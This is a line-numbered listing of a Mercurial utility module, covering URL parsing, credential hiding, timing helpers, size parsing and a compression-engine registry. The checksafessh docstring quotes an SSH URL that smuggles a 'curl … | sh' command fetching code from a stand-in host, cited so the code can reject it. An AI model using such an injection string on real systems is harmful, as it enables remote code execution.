2592 2606 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2593 2607 """Return the result of interpolating items in the mapping into string s.
2594 2608
2595 2609 prefix is a single character string, or a two character string with
2596 2610 a backslash as the first character if the prefix needs to be escaped in
2597 2611 a regular expression.
2598 2612
2599 2613 fn is an optional function that will be applied to the replacement text
2600 2614 just before replacement.
2601 2615
2602 2616 escape_prefix is an optional flag that allows using doubled prefix for
2603 2617 its escaping.
2604 2618 """
2605 2619 fn = fn or (lambda s: s)
2606 2620 patterns = '|'.join(mapping.keys())
2607 2621 if escape_prefix:
2608 2622 patterns += '|' + prefix
2609 2623 if len(prefix) > 1:
2610 2624 prefix_char = prefix[1:]
2611 2625 else:
2612 2626 prefix_char = prefix
2613 2627 mapping[prefix_char] = prefix_char
2614 2628 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2615 2629 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2616 2630
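# Illustrative sketch (not part of the module): simple placeholder
# expansion with a one-character prefix:
#
#   interpolate(b'%', {b'user': b'alice'}, b'hello %user')
#   # -> b'hello alice'
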
2617 2631 def getport(port):
2618 2632 """Return the port for a given network service.
2619 2633
2620 2634 If port is an integer, it's returned as is. If it's a string, it's
2621 2635 looked up using socket.getservbyname(). If there's no matching
2622 2636 service, error.Abort is raised.
2623 2637 """
2624 2638 try:
2625 2639 return int(port)
2626 2640 except ValueError:
2627 2641 pass
2628 2642
2629 2643 try:
2630 2644 return socket.getservbyname(pycompat.sysstr(port))
2631 2645 except socket.error:
2632 2646 raise error.Abort(_("no port number associated with service '%s'")
2633 2647 % port)
2634 2648
2635 2649 class url(object):
2636 2650 r"""Reliable URL parser.
2637 2651
2638 2652 This parses URLs and provides attributes for the following
2639 2653 components:
2640 2654
2641 2655 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642 2656
2643 2657 Missing components are set to None. The only exception is
2644 2658 fragment, which is set to '' if present but empty.
2645 2659
2646 2660 If parsefragment is False, fragment is included in query. If
2647 2661 parsequery is False, query is included in path. If both are
2648 2662 False, both fragment and query are included in path.
2649 2663
2650 2664 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651 2665
2652 2666 Note that for backward compatibility reasons, bundle URLs do not
2653 2667 take host names. That means 'bundle://../' has a path of '../'.
2654 2668
2655 2669 Examples:
2656 2670
2657 2671 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2658 2672 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 2673 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2660 2674 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 2675 >>> url(b'file:///home/joe/repo')
2662 2676 <url scheme: 'file', path: '/home/joe/repo'>
2663 2677 >>> url(b'file:///c:/temp/foo/')
2664 2678 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 2679 >>> url(b'bundle:foo')
2666 2680 <url scheme: 'bundle', path: 'foo'>
2667 2681 >>> url(b'bundle://../foo')
2668 2682 <url scheme: 'bundle', path: '../foo'>
2669 2683 >>> url(br'c:\foo\bar')
2670 2684 <url path: 'c:\\foo\\bar'>
2671 2685 >>> url(br'\\blah\blah\blah')
2672 2686 <url path: '\\\\blah\\blah\\blah'>
2673 2687 >>> url(br'\\blah\blah\blah#baz')
2674 2688 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 2689 >>> url(br'file:///C:\users\me')
2676 2690 <url scheme: 'file', path: 'C:\\users\\me'>
2677 2691
2678 2692 Authentication credentials:
2679 2693
2680 2694 >>> url(b'ssh://joe:xyz@x/repo')
2681 2695 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 2696 >>> url(b'ssh://joe@x/repo')
2683 2697 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684 2698
2685 2699 Query strings and fragments:
2686 2700
2687 2701 >>> url(b'http://host/a?b#c')
2688 2702 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2689 2703 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2690 2704 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691 2705
2692 2706 Empty path:
2693 2707
2694 2708 >>> url(b'')
2695 2709 <url path: ''>
2696 2710 >>> url(b'#a')
2697 2711 <url path: '', fragment: 'a'>
2698 2712 >>> url(b'http://host/')
2699 2713 <url scheme: 'http', host: 'host', path: ''>
2700 2714 >>> url(b'http://host/#a')
2701 2715 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702 2716
2703 2717 Only scheme:
2704 2718
2705 2719 >>> url(b'http:')
2706 2720 <url scheme: 'http'>
2707 2721 """
2708 2722
2709 2723 _safechars = "!~*'()+"
2710 2724 _safepchars = "/!~*'()+:\\"
2711 2725 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712 2726
2713 2727 def __init__(self, path, parsequery=True, parsefragment=True):
2714 2728 # We slowly chomp away at path until we have only the path left
2715 2729 self.scheme = self.user = self.passwd = self.host = None
2716 2730 self.port = self.path = self.query = self.fragment = None
2717 2731 self._localpath = True
2718 2732 self._hostport = ''
2719 2733 self._origpath = path
2720 2734
2721 2735 if parsefragment and '#' in path:
2722 2736 path, self.fragment = path.split('#', 1)
2723 2737
2724 2738 # special case for Windows drive letters and UNC paths
2725 2739 if hasdriveletter(path) or path.startswith('\\\\'):
2726 2740 self.path = path
2727 2741 return
2728 2742
2729 2743 # For compatibility reasons, we can't handle bundle paths as
2730 2744 # normal URLs
2731 2745 if path.startswith('bundle:'):
2732 2746 self.scheme = 'bundle'
2733 2747 path = path[7:]
2734 2748 if path.startswith('//'):
2735 2749 path = path[2:]
2736 2750 self.path = path
2737 2751 return
2738 2752
2739 2753 if self._matchscheme(path):
2740 2754 parts = path.split(':', 1)
2741 2755 if parts[0]:
2742 2756 self.scheme, path = parts
2743 2757 self._localpath = False
2744 2758
2745 2759 if not path:
2746 2760 path = None
2747 2761 if self._localpath:
2748 2762 self.path = ''
2749 2763 return
2750 2764 else:
2751 2765 if self._localpath:
2752 2766 self.path = path
2753 2767 return
2754 2768
2755 2769 if parsequery and '?' in path:
2756 2770 path, self.query = path.split('?', 1)
2757 2771 if not path:
2758 2772 path = None
2759 2773 if not self.query:
2760 2774 self.query = None
2761 2775
2762 2776 # // is required to specify a host/authority
2763 2777 if path and path.startswith('//'):
2764 2778 parts = path[2:].split('/', 1)
2765 2779 if len(parts) > 1:
2766 2780 self.host, path = parts
2767 2781 else:
2768 2782 self.host = parts[0]
2769 2783 path = None
2770 2784 if not self.host:
2771 2785 self.host = None
2772 2786 # path of file:///d is /d
2773 2787 # path of file:///d:/ is d:/, not /d:/
2774 2788 if path and not hasdriveletter(path):
2775 2789 path = '/' + path
2776 2790
2777 2791 if self.host and '@' in self.host:
2778 2792 self.user, self.host = self.host.rsplit('@', 1)
2779 2793 if ':' in self.user:
2780 2794 self.user, self.passwd = self.user.split(':', 1)
2781 2795 if not self.host:
2782 2796 self.host = None
2783 2797
2784 2798 # Don't split on colons in IPv6 addresses without ports
2785 2799 if (self.host and ':' in self.host and
2786 2800 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 2801 self._hostport = self.host
2788 2802 self.host, self.port = self.host.rsplit(':', 1)
2789 2803 if not self.host:
2790 2804 self.host = None
2791 2805
2792 2806 if (self.host and self.scheme == 'file' and
2793 2807 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 2808 raise error.Abort(_('file:// URLs can only refer to localhost'))
2795 2809
2796 2810 self.path = path
2797 2811
2798 2812 # leave the query string escaped
2799 2813 for a in ('user', 'passwd', 'host', 'port',
2800 2814 'path', 'fragment'):
2801 2815 v = getattr(self, a)
2802 2816 if v is not None:
2803 2817 setattr(self, a, urlreq.unquote(v))
2804 2818
2805 2819 @encoding.strmethod
2806 2820 def __repr__(self):
2807 2821 attrs = []
2808 2822 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2809 2823 'query', 'fragment'):
2810 2824 v = getattr(self, a)
2811 2825 if v is not None:
2812 2826 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2813 2827 return '<url %s>' % ', '.join(attrs)
2814 2828
2815 2829 def __bytes__(self):
2816 2830 r"""Join the URL's components back into a URL string.
2817 2831
2818 2832 Examples:
2819 2833
2820 2834 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2821 2835 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2822 2836 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2823 2837 'http://user:pw@host:80/?foo=bar&baz=42'
2824 2838 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2825 2839 'http://user:pw@host:80/?foo=bar%3dbaz'
2826 2840 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2827 2841 'ssh://user:pw@[::1]:2200//home/joe#'
2828 2842 >>> bytes(url(b'http://localhost:80//'))
2829 2843 'http://localhost:80//'
2830 2844 >>> bytes(url(b'http://localhost:80/'))
2831 2845 'http://localhost:80/'
2832 2846 >>> bytes(url(b'http://localhost:80'))
2833 2847 'http://localhost:80/'
2834 2848 >>> bytes(url(b'bundle:foo'))
2835 2849 'bundle:foo'
2836 2850 >>> bytes(url(b'bundle://../foo'))
2837 2851 'bundle:../foo'
2838 2852 >>> bytes(url(b'path'))
2839 2853 'path'
2840 2854 >>> bytes(url(b'file:///tmp/foo/bar'))
2841 2855 'file:///tmp/foo/bar'
2842 2856 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2843 2857 'file:///c:/tmp/foo/bar'
2844 2858 >>> print(url(br'bundle:foo\bar'))
2845 2859 bundle:foo\bar
2846 2860 >>> print(url(br'file:///D:\data\hg'))
2847 2861 file:///D:\data\hg
2848 2862 """
2849 2863 if self._localpath:
2850 2864 s = self.path
2851 2865 if self.scheme == 'bundle':
2852 2866 s = 'bundle:' + s
2853 2867 if self.fragment:
2854 2868 s += '#' + self.fragment
2855 2869 return s
2856 2870
2857 2871 s = self.scheme + ':'
2858 2872 if self.user or self.passwd or self.host:
2859 2873 s += '//'
2860 2874 elif self.scheme and (not self.path or self.path.startswith('/')
2861 2875 or hasdriveletter(self.path)):
2862 2876 s += '//'
2863 2877 if hasdriveletter(self.path):
2864 2878 s += '/'
2865 2879 if self.user:
2866 2880 s += urlreq.quote(self.user, safe=self._safechars)
2867 2881 if self.passwd:
2868 2882 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2869 2883 if self.user or self.passwd:
2870 2884 s += '@'
2871 2885 if self.host:
2872 2886 if not (self.host.startswith('[') and self.host.endswith(']')):
2873 2887 s += urlreq.quote(self.host)
2874 2888 else:
2875 2889 s += self.host
2876 2890 if self.port:
2877 2891 s += ':' + urlreq.quote(self.port)
2878 2892 if self.host:
2879 2893 s += '/'
2880 2894 if self.path:
2881 2895 # TODO: similar to the query string, we should not unescape the
2882 2896 # path when we store it, the path might contain '%2f' = '/',
2883 2897 # which we should *not* escape.
2884 2898 s += urlreq.quote(self.path, safe=self._safepchars)
2885 2899 if self.query:
2886 2900 # we store the query in escaped form.
2887 2901 s += '?' + self.query
2888 2902 if self.fragment is not None:
2889 2903 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2890 2904 return s
2891 2905
2892 2906 __str__ = encoding.strmethod(__bytes__)
2893 2907
2894 2908 def authinfo(self):
2895 2909 user, passwd = self.user, self.passwd
2896 2910 try:
2897 2911 self.user, self.passwd = None, None
2898 2912 s = bytes(self)
2899 2913 finally:
2900 2914 self.user, self.passwd = user, passwd
2901 2915 if not self.user:
2902 2916 return (s, None)
2903 2917 # authinfo[1] is passed to urllib2 password manager, and its
2904 2918 # URIs must not contain credentials. The host is passed in the
2905 2919 # URIs list because Python < 2.4.3 uses only that to search for
2906 2920 # a password.
2907 2921 return (s, (None, (s, self.host),
2908 2922 self.user, self.passwd or ''))
2909 2923
2910 2924 def isabs(self):
2911 2925 if self.scheme and self.scheme != 'file':
2912 2926 return True # remote URL
2913 2927 if hasdriveletter(self.path):
2914 2928 return True # absolute for our purposes - can't be joined()
2915 2929 if self.path.startswith(br'\\'):
2916 2930 return True # Windows UNC path
2917 2931 if self.path.startswith('/'):
2918 2932 return True # POSIX-style
2919 2933 return False
2920 2934
2921 2935 def localpath(self):
2922 2936 if self.scheme == 'file' or self.scheme == 'bundle':
2923 2937 path = self.path or '/'
2924 2938 # For Windows, we need to promote hosts containing drive
2925 2939 # letters to paths with drive letters.
2926 2940 if hasdriveletter(self._hostport):
2927 2941 path = self._hostport + '/' + self.path
2928 2942 elif (self.host is not None and self.path
2929 2943 and not hasdriveletter(path)):
2930 2944 path = '/' + path
2931 2945 return path
2932 2946 return self._origpath
2933 2947
2934 2948 def islocal(self):
2935 2949 '''whether localpath will return something that posixfile can open'''
2936 2950 return (not self.scheme or self.scheme == 'file'
2937 2951 or self.scheme == 'bundle')
2938 2952
2939 2953 def hasscheme(path):
2940 2954 return bool(url(path).scheme)
2941 2955
2942 2956 def hasdriveletter(path):
2943 2957 return path and path[1:2] == ':' and path[0:1].isalpha()
2944 2958
2945 2959 def urllocalpath(path):
2946 2960 return url(path, parsequery=False, parsefragment=False).localpath()
2947 2961
2948 2962 def checksafessh(path):
2949 2963 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2950 2964
2951 2965 This is a sanity check for ssh urls. ssh will parse the first item as
2952 2966 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2953 2967 Let's prevent these potentially exploited urls entirely and warn the
2954 2968 user.
2955 2969
2956 2970 Raises an error.Abort when the url is unsafe.
2957 2971 """
2958 2972 path = urlreq.unquote(path)
2959 2973 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2960 2974 raise error.Abort(_('potentially unsafe url: %r') %
2961 2975 (pycompat.bytestr(path),))
2962 2976
2963 2977 def hidepassword(u):
2964 2978 '''hide user credential in a url string'''
2965 2979 u = url(u)
2966 2980 if u.passwd:
2967 2981 u.passwd = '***'
2968 2982 return bytes(u)
2969 2983
2970 2984 def removeauth(u):
2971 2985 '''remove all authentication information from a url string'''
2972 2986 u = url(u)
2973 2987 u.user = u.passwd = None
2974 2988 return bytes(u)
2975 2989
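# Illustrative sketch (not part of the module): both helpers round-trip
# through the url class, so the rest of the URL survives verbatim:
#
#   hidepassword(b'http://joe:secret@example.com/repo')
#   # -> b'http://joe:***@example.com/repo'
#   removeauth(b'http://joe:secret@example.com/repo')
#   # -> b'http://example.com/repo'
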
2976 2990 timecount = unitcountfn(
2977 2991 (1, 1e3, _('%.0f s')),
2978 2992 (100, 1, _('%.1f s')),
2979 2993 (10, 1, _('%.2f s')),
2980 2994 (1, 1, _('%.3f s')),
2981 2995 (100, 0.001, _('%.1f ms')),
2982 2996 (10, 0.001, _('%.2f ms')),
2983 2997 (1, 0.001, _('%.3f ms')),
2984 2998 (100, 0.000001, _('%.1f us')),
2985 2999 (10, 0.000001, _('%.2f us')),
2986 3000 (1, 0.000001, _('%.3f us')),
2987 3001 (100, 0.000000001, _('%.1f ns')),
2988 3002 (10, 0.000000001, _('%.2f ns')),
2989 3003 (1, 0.000000001, _('%.3f ns')),
2990 3004 )
2991 3005
2992 3006 @attr.s
2993 3007 class timedcmstats(object):
2994 3008 """Stats information produced by the timedcm context manager on entering."""
2995 3009
2996 3010 # the starting value of the timer as a float (meaning and resolution are
2997 3011 # platform dependent, see util.timer)
2998 3012 start = attr.ib(default=attr.Factory(lambda: timer()))
2999 3013 # the number of seconds as a floating point value; starts at 0, updated when
3000 3014 # the context is exited.
3001 3015 elapsed = attr.ib(default=0)
3002 3016 # the number of nested timedcm context managers.
3003 3017 level = attr.ib(default=1)
3004 3018
3005 3019 def __bytes__(self):
3006 3020 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3007 3021
3008 3022 __str__ = encoding.strmethod(__bytes__)
3009 3023
3010 3024 @contextlib.contextmanager
3011 3025 def timedcm(whencefmt, *whenceargs):
3012 3026 """A context manager that produces timing information for a given context.
3013 3027
3014 3028 On entering a timedcmstats instance is produced.
3015 3029
3016 3030 This context manager is reentrant.
3017 3031
3018 3032 """
3019 3033 # track nested context managers
3020 3034 timedcm._nested += 1
3021 3035 timing_stats = timedcmstats(level=timedcm._nested)
3022 3036 try:
3023 3037 with tracing.log(whencefmt, *whenceargs):
3024 3038 yield timing_stats
3025 3039 finally:
3026 3040 timing_stats.elapsed = timer() - timing_stats.start
3027 3041 timedcm._nested -= 1
3028 3042
3029 3043 timedcm._nested = 0
3030 3044
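# Illustrative sketch (not part of the module): timing a block with
# timedcm. The stats object is live inside the block and its `elapsed`
# field is filled in on exit:
#
#   with timedcm(b'demo %s', b'phase1') as stats:
#       expensive_work()            # hypothetical callable
#   print(bytes(stats))             # e.g. '12.3 ms'
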
3031 3045 def timed(func):
3032 3046 '''Report the execution time of a function call to stderr.
3033 3047
3034 3048 During development, use as a decorator when you need to measure
3035 3049 the cost of a function, e.g. as follows:
3036 3050
3037 3051 @util.timed
3038 3052 def foo(a, b, c):
3039 3053 pass
3040 3054 '''
3041 3055
3042 3056 def wrapper(*args, **kwargs):
3043 3057 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3044 3058 result = func(*args, **kwargs)
3045 3059 stderr = procutil.stderr
3046 3060 stderr.write('%s%s: %s\n' % (
3047 3061 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3048 3062 time_stats))
3049 3063 return result
3050 3064 return wrapper
3051 3065
3052 3066 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3053 3067 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3054 3068
3055 3069 def sizetoint(s):
3056 3070 '''Convert a space specifier to a byte count.
3057 3071
3058 3072 >>> sizetoint(b'30')
3059 3073 30
3060 3074 >>> sizetoint(b'2.2kb')
3061 3075 2252
3062 3076 >>> sizetoint(b'6M')
3063 3077 6291456
3064 3078 '''
3065 3079 t = s.strip().lower()
3066 3080 try:
3067 3081 for k, u in _sizeunits:
3068 3082 if t.endswith(k):
3069 3083 return int(float(t[:-len(k)]) * u)
3070 3084 return int(t)
3071 3085 except ValueError:
3072 3086 raise error.ParseError(_("couldn't parse size: %s") % s)
3073 3087
3074 3088 class hooks(object):
3075 3089 '''A collection of hook functions that can be used to extend a
3076 3090 function's behavior. Hooks are called in lexicographic order,
3077 3091 based on the names of their sources.'''
3078 3092
3079 3093 def __init__(self):
3080 3094 self._hooks = []
3081 3095
3082 3096 def add(self, source, hook):
3083 3097 self._hooks.append((source, hook))
3084 3098
3085 3099 def __call__(self, *args):
3086 3100 self._hooks.sort(key=lambda x: x[0])
3087 3101 results = []
3088 3102 for source, hook in self._hooks:
3089 3103 results.append(hook(*args))
3090 3104 return results
3091 3105
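# Illustrative sketch (not part of the module): hooks fire in
# lexicographic order of their source names, not registration order:
#
#   h = hooks()
#   h.add(b'zzz', lambda x: x + 1)
#   h.add(b'aaa', lambda x: x * 2)
#   h(10)                           # -> [20, 11] ('aaa' runs first)
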
3092 3106 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3093 3107 '''Yields lines for a nicely formatted stacktrace.
3094 3108 Skips the 'skip' last entries, then returns the last 'depth' entries.
3095 3109 Each file+linenumber is formatted according to fileline.
3096 3110 Each line is formatted according to line.
3097 3111 If line is None, it yields:
3098 3112 length of longest filepath+line number,
3099 3113 filepath+linenumber,
3100 3114 function
3101 3115
3102 3116 Not be used in production code but very convenient while developing.
3103 3117 '''
3104 3118 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3105 3119 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3106 3120 ][-depth:]
3107 3121 if entries:
3108 3122 fnmax = max(len(entry[0]) for entry in entries)
3109 3123 for fnln, func in entries:
3110 3124 if line is None:
3111 3125 yield (fnmax, fnln, func)
3112 3126 else:
3113 3127 yield line % (fnmax, fnln, func)
3114 3128
3115 3129 def debugstacktrace(msg='stacktrace', skip=0,
3116 3130 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3117 3131 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3118 3132 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3119 3133 By default it will flush stdout first.
3120 3134 It can be used everywhere and intentionally does not require an ui object.
3121 3135 Not be used in production code but very convenient while developing.
3122 3136 '''
3123 3137 if otherf:
3124 3138 otherf.flush()
3125 3139 f.write('%s at:\n' % msg.rstrip())
3126 3140 for line in getstackframes(skip + 1, depth=depth):
3127 3141 f.write(line)
3128 3142 f.flush()
3129 3143
3130 3144 class dirs(object):
3131 3145 '''a multiset of directory names from a dirstate or manifest'''
3132 3146
3133 3147 def __init__(self, map, skip=None):
3134 3148 self._dirs = {}
3135 3149 addpath = self.addpath
3136 3150 if safehasattr(map, 'iteritems') and skip is not None:
3137 3151 for f, s in map.iteritems():
3138 3152 if s[0] != skip:
3139 3153 addpath(f)
3140 3154 else:
3141 3155 for f in map:
3142 3156 addpath(f)
3143 3157
3144 3158 def addpath(self, path):
3145 3159 dirs = self._dirs
3146 3160 for base in finddirs(path):
3147 3161 if base in dirs:
3148 3162 dirs[base] += 1
3149 3163 return
3150 3164 dirs[base] = 1
3151 3165
3152 3166 def delpath(self, path):
3153 3167 dirs = self._dirs
3154 3168 for base in finddirs(path):
3155 3169 if dirs[base] > 1:
3156 3170 dirs[base] -= 1
3157 3171 return
3158 3172 del dirs[base]
3159 3173
3160 3174 def __iter__(self):
3161 3175 return iter(self._dirs)
3162 3176
3163 3177 def __contains__(self, d):
3164 3178 return d in self._dirs
3165 3179
3166 3180 if safehasattr(parsers, 'dirs'):
3167 3181 dirs = parsers.dirs
3168 3182
3169 3183 def finddirs(path):
3170 3184 pos = path.rfind('/')
3171 3185 while pos != -1:
3172 3186 yield path[:pos]
3173 3187 pos = path.rfind('/', 0, pos)
3174 3188
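# Illustrative sketch (not part of the module): finddirs yields ancestor
# directories from the deepest upwards, and dirs() counts them as a
# multiset:
#
#   list(finddirs(b'a/b/c'))        # -> [b'a/b', b'a']
#   d = dirs([b'a/b/c', b'a/d'])
#   b'a' in d                       # -> True (shared by both paths)
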
3175 3189 # compression code
3176 3190
3177 3191 SERVERROLE = 'server'
3178 3192 CLIENTROLE = 'client'
3179 3193
3180 3194 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3181 3195 (u'name', u'serverpriority',
3182 3196 u'clientpriority'))
3183 3197
3184 3198 class compressormanager(object):
3185 3199 """Holds registrations of various compression engines.
3186 3200
3187 3201 This class essentially abstracts the differences between compression
3188 3202 engines to allow new compression formats to be added easily, possibly from
3189 3203 extensions.
3190 3204
3191 3205 Compressors are registered against the global instance by calling its
3192 3206 ``register()`` method.
3193 3207 """
3194 3208 def __init__(self):
3195 3209 self._engines = {}
3196 3210 # Bundle spec human name to engine name.
3197 3211 self._bundlenames = {}
3198 3212 # Internal bundle identifier to engine name.
3199 3213 self._bundletypes = {}
3200 3214 # Revlog header to engine name.
3201 3215 self._revlogheaders = {}
3202 3216 # Wire proto identifier to engine name.
3203 3217 self._wiretypes = {}
3204 3218
3205 3219 def __getitem__(self, key):
3206 3220 return self._engines[key]
3207 3221
3208 3222 def __contains__(self, key):
3209 3223 return key in self._engines
3210 3224
3211 3225 def __iter__(self):
3212 3226 return iter(self._engines.keys())
3213 3227
3214 3228 def register(self, engine):
3215 3229 """Register a compression engine with the manager.
3216 3230
3217 3231 The argument must be a ``compressionengine`` instance.
3218 3232 """
3219 3233 if not isinstance(engine, compressionengine):
3220 3234 raise ValueError(_('argument must be a compressionengine'))
3221 3235
3222 3236 name = engine.name()
3223 3237
3224 3238 if name in self._engines:
3225 3239 raise error.Abort(_('compression engine %s already registered') %
3226 3240 name)
3227 3241
3228 3242 bundleinfo = engine.bundletype()
3229 3243 if bundleinfo:
3230 3244 bundlename, bundletype = bundleinfo
3231 3245
3232 3246 if bundlename in self._bundlenames:
3233 3247 raise error.Abort(_('bundle name %s already registered') %
3234 3248 bundlename)
3235 3249 if bundletype in self._bundletypes:
3236 3250 raise error.Abort(_('bundle type %s already registered by %s') %
3237 3251 (bundletype, self._bundletypes[bundletype]))
3238 3252
3239 3253 # No external facing name declared.
3240 3254 if bundlename:
3241 3255 self._bundlenames[bundlename] = name
3242 3256
3243 3257 self._bundletypes[bundletype] = name
3244 3258
3245 3259 wiresupport = engine.wireprotosupport()
3246 3260 if wiresupport:
3247 3261 wiretype = wiresupport.name
3248 3262 if wiretype in self._wiretypes:
3249 3263 raise error.Abort(_('wire protocol compression %s already '
3250 3264 'registered by %s') %
3251 3265 (wiretype, self._wiretypes[wiretype]))
3252 3266
3253 3267 self._wiretypes[wiretype] = name
3254 3268
3255 3269 revlogheader = engine.revlogheader()
3256 3270 if revlogheader and revlogheader in self._revlogheaders:
3257 3271 raise error.Abort(_('revlog header %s already registered by %s') %
3258 3272 (revlogheader, self._revlogheaders[revlogheader]))
3259 3273
3260 3274 if revlogheader:
3261 3275 self._revlogheaders[revlogheader] = name
3262 3276
3263 3277 self._engines[name] = engine
3264 3278
3265 3279 @property
3266 3280 def supportedbundlenames(self):
3267 3281 return set(self._bundlenames.keys())
3268 3282
3269 3283 @property
3270 3284 def supportedbundletypes(self):
3271 3285 return set(self._bundletypes.keys())
3272 3286
3273 3287 def forbundlename(self, bundlename):
3274 3288 """Obtain a compression engine registered to a bundle name.
3275 3289
3276 3290 Will raise KeyError if the bundle type isn't registered.
3277 3291
3278 3292 Will abort if the engine is known but not available.
3279 3293 """
3280 3294 engine = self._engines[self._bundlenames[bundlename]]
3281 3295 if not engine.available():
3282 3296 raise error.Abort(_('compression engine %s could not be loaded') %
3283 3297 engine.name())
3284 3298 return engine
3285 3299
3286 3300 def forbundletype(self, bundletype):
3287 3301 """Obtain a compression engine registered to a bundle type.
3288 3302
3289 3303 Will raise KeyError if the bundle type isn't registered.
3290 3304
3291 3305 Will abort if the engine is known but not available.
3292 3306 """
3293 3307 engine = self._engines[self._bundletypes[bundletype]]
3294 3308 if not engine.available():
3295 3309 raise error.Abort(_('compression engine %s could not be loaded') %
3296 3310 engine.name())
3297 3311 return engine
3298 3312
3299 3313 def supportedwireengines(self, role, onlyavailable=True):
3300 3314 """Obtain compression engines that support the wire protocol.
3301 3315
3302 3316 Returns a list of engines in prioritized order, most desired first.
3303 3317
3304 3318 If ``onlyavailable`` is set, filter out engines that can't be
3305 3319 loaded.
3306 3320 """
3307 3321 assert role in (SERVERROLE, CLIENTROLE)
3308 3322
3309 3323 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3310 3324
3311 3325 engines = [self._engines[e] for e in self._wiretypes.values()]
3312 3326 if onlyavailable:
3313 3327 engines = [e for e in engines if e.available()]
3314 3328
3315 3329 def getkey(e):
3316 3330 # Sort first by priority, highest first. In case of tie, sort
3317 3331 # alphabetically. This is arbitrary, but ensures output is
3318 3332 # stable.
3319 3333 w = e.wireprotosupport()
3320 3334 return -1 * getattr(w, attr), w.name
3321 3335
3322 3336 return list(sorted(engines, key=getkey))
3323 3337
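    # Illustrative example (not part of the original change): with the four
    # engines registered later in this module, and assuming the zstd module
    # is importable, the server-side ordering works out to
    #
    #   [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
    #   -> ['zstd', 'zlib', 'bzip2', 'none']
    #
    # zstd (priority 50) sorts ahead of zlib (20); bzip2 and none tie at 0
    # and fall back to alphabetical order.
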
3324 3338 def forwiretype(self, wiretype):
3325 3339 engine = self._engines[self._wiretypes[wiretype]]
3326 3340 if not engine.available():
3327 3341 raise error.Abort(_('compression engine %s could not be loaded') %
3328 3342 engine.name())
3329 3343 return engine
3330 3344
3331 3345 def forrevlogheader(self, header):
3332 3346 """Obtain a compression engine registered to a revlog header.
3333 3347
3334 3348 Will raise KeyError if the revlog header value isn't registered.
3335 3349 """
3336 3350 return self._engines[self._revlogheaders[header]]
3337 3351
3338 3352 compengines = compressormanager()
3339 3353
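# Illustrative sketch (not part of the original change): consumers resolve
# engines through this manager rather than importing one directly. The
# helper below is hypothetical and never called; the 'gzip' bundle name is
# registered by the zlib engine further down in this module.
def _examplebundlelookup():
    engine = compengines.forbundlename('gzip')
    assert engine.name() == 'zlib'
    return engine
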
3340 3354 class compressionengine(object):
3341 3355 """Base class for compression engines.
3342 3356
3343 3357 Compression engines must implement the interface defined by this class.
3344 3358 """
3345 3359 def name(self):
3346 3360 """Returns the name of the compression engine.
3347 3361
3348 3362 This is the key the engine is registered under.
3349 3363
3350 3364 This method must be implemented.
3351 3365 """
3352 3366 raise NotImplementedError()
3353 3367
3354 3368 def available(self):
3355 3369 """Whether the compression engine is available.
3356 3370
3357 3371 The intent of this method is to allow optional compression engines
3358 3372 that may not be available in all installations (such as engines relying
3359 3373 on C extensions that may not be present).
3360 3374 """
3361 3375 return True
3362 3376
3363 3377 def bundletype(self):
3364 3378 """Describes bundle identifiers for this engine.
3365 3379
3366 3380 If this compression engine isn't supported for bundles, returns None.
3367 3381
3368 3382 If this engine can be used for bundles, returns a 2-tuple of strings of
3369 3383 the user-facing "bundle spec" compression name and an internal
3370 3384 identifier used to denote the compression format within bundles. To
3371 3385 exclude the name from external usage, set the first element to ``None``.
3372 3386
3373 3387 If bundle compression is supported, the class must also implement
3374 3388 ``compressstream`` and ``decompressorreader``.
3375 3389
3376 3390 The docstring of this method is used in the help system to tell users
3377 3391 about this engine.
3378 3392 """
3379 3393 return None
3380 3394
3381 3395 def wireprotosupport(self):
3382 3396 """Declare support for this compression format on the wire protocol.
3383 3397
3384 3398 If this compression engine isn't supported for compressing wire
